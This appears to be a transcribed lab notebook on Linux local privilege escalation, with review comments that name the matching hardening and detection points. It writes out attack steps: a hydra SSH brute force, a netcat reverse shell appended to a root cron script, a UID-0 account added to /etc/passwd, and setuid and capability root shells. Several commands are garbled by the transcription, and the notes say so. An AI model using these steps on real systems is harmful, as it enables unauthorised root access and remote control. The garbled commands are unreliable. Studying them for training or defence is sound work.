# Linux local privilege-escalation lab notes, transcribed from a session log.
# Several lines are garbled by the transcription (OCR-style substitutions,
# wrapped lines, copied shell prompts); those are flagged with NOTE(review)
# comments and left as written rather than silently rewritten. Each section
# also names the hardening control that removes the corresponding weakness.
#
# --- identity, host and network enumeration ---
id
cat /etc/passwd
hostname
cat /etc/issue
cat /etc/os-release
uname -a
ps aux
ip a
ifconfig a   # NOTE(review): looks like `ifconfig -a`; ifconfig is absent on many current distros, `ip a` above is the replacement
route/routel   # NOTE(review): a reminder to use `route` or `routel`, not a literal command
# active connections, open ports
ss -anp
# firewall
cat /etc/iptables   # NOTE(review): not a standard file; where rules are persisted is distro-specific (e.g. a directory under /etc with iptables-persistent on Debian), and reading live rules needs root
# scheduled tasks -- a cron script writable by an unprivileged user is a classic root-escalation misconfiguration; keep job files root-owned and not group/world-writable
ls -lah /etc/cron*
crontab -l
sudo crontab -l
# packages installed through the package manager (Debian family)
dpkg -l
# find writable files
find -writable -type d 2>/dev/null   # NOTE(review): no start path, so this only searches below the current directory; `/` was presumably intended. Also lists directories (-type d), not files, despite the comment
# list mounted file systems
mount
cat /etc/fstab # list all drives mounted at boot time
lsblk # all available disks
lsmod # enumerate kernel modules
/sbin/modinfo <module> # info about specific module (<module> is a placeholder)
# setuid, setgid
# search for setuid binaries system-wide; defenders compare this list against a baseline and ask whether each program still needs the bit
find / -perm -u=s -type f 2>/dev/null
# automated enumeration script; the redirect leaves output.txt on disk, which is also a forensic artefact of the activity
unix-privesc-check
./unix-privesc-check standard > output.txt
.bashrc   # NOTE(review): bare filename -- presumably a reminder to inspect shell start-up files; not runnable as written
# create wordlist for bruteforce (fixed-pattern candidates; length and no predictable structure is exactly what password policy is meant to enforce)
crunch 6 6 -t Lab%%% > wordlist
# bruteforce with hydra -- online SSH guessing; every attempt is an authentication failure in the target's auth log, so rate limiting or lockout defeats it
hydra -1 eve -P wordlist 192.168.129.214 -t 4 ssh   # NOTE(review): `-1` reads like a transcription of a letter option; check hydra's usage text before relying on this line
sudo -l   # what the current user may run through sudo
sudo -i   # root login shell, only if sudo policy allows it
# watch system activities that hold passwords or other secrets on the command line
watch -n 1 "ps - aux I grep pass"   # NOTE(review): garbled -- the `I` looks like the pipe character and `- aux` has a stray space; the grep also matches its own process. Root cause for defenders: secrets passed as argv are readable by every local user through /proc
sudo tcpdump -i lo -A | grep "pass"   # needs root; only finds credentials sent in cleartext over loopback
# abusing Cron jobs
grep "CRON" /var/log/syslog   # shows which jobs run, as which user, and how often
# revshell -- the next two lines are ONE command that wrapped in transcription, and the leading
# `joe@debian-privesc:~/.scripts` is the shell prompt, not part of it. It appends a reverse shell to a
# script that a root cron job executes; the misconfiguration is that script being writable by joe.
# Detection: a cron-spawned /bin/sh opening an outbound connection, and a fifo created under /tmp
joe@debian-privesc:~/.scripts echo "rm /tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc
192.168.119.129 1234 >/tmp/f" >> user_backups.sh
# a writable /etc/passwd lets anyone add a UID-0 account; it must stay root-owned 0644, and any extra UID-0 entry is a high-confidence detection
if we can write /etc/passwd
openssl passwd PASS   # PASS is a placeholder; prints the crypt-style hash placed in the passwd entry below
echo "root2:16zpgl8z18tp6:0:0:root:/root:/bin/bash" >> /etc/passwd
grep Uid /proc/5489/status   # real/effective/saved/fs UIDs of PID 5489 (the process being checked)
# if find has setuid
find /home/joe/Desktop -exec "/us/bin/bash" -p\;   # NOTE(review): garbled -- the binary path has a typo and find expects `\;` as a separate argument after the -exec command
find /bin -perm -4000 # find setuid (same check as the `/` search above, limited to /bin)
# search cap_setuid files -- a file capability granting setuid to an interpreter is equivalent to a setuid-root binary, so getcap output belongs in the same audit as the setuid list
/usr/sbin/getcap -r / 2>/dev/null
# https://gtfobins.github.io/gtfobins/perl/#capabilities
# contains examples for some cap_setuid we could find
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
sudo -l
cat /etc/sudoes   # NOTE(review): typo for /etc/sudoers; that file is 0440 root-owned, so this only works as root anyway -- `sudo -l` above is the unprivileged equivalent
# example tcpdump (gtfobins)
# big command failed
cat /var/log/syslog | grep tcpdump   # AppArmor denials are logged here; a denial means the confinement profile worked as designed
# apparmor blocked our gtfobins
# example apt-get -- a sudo rule for a package manager is effectively root, because apt-get hands control to a pager/child process
sudo apt-get changelog apt
### Exploiting Kernel Vulnerabilities
# version fingerprinting for the exploit search below; kernel exploits can crash the host, and patching is the only real mitigation
cat /etc/issue
uname -r
arch
# NOTE(review): the next two lines are one command (transcription wrap), the `|` before the first grep is missing, and `kali@kali:~$` is the prompt
kali@kali:~$ searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" grep "4
." | grep -v " < 4.4.0" | grep -v "4.8"